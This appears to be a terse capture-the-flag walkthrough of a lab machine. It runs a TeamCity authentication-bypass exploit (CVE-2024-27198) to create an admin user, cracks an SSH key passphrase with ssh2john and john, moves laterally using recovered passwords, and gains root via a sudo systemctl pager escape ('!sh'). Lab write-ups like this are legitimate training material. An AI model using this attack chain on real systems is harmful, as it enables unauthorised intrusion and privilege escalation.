80
We can view sourcecode:
There is a subdomain: Adding to hosts and accessing:
Using this exploit:
python3 CVE-2024-27198.py -t http://teams.onlyrands.com -u mynewadminuser -p mypassword
We are logged in.
We find an id_rsa file in marco's changelogs: It is asking password so we can use ssh2john:
ssh2john id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt We cracked it.
Now we can ssh to marcot: Running linpeas we find mails:
We can try to give everyone permissions:
chmod 777 *
we can only access marcot's mails.
We have a password for matthew
Now we can switch to matthewa user:
There is a weird file.
We have password for a user.
In /etc/passwd
:
It's braind user's password. We are briand:
Now we can use gtfobins:
We can get root now:
sudo /usr/bin/systemctl status teamcity-server.service
!sh

Last updated
Was this helpful?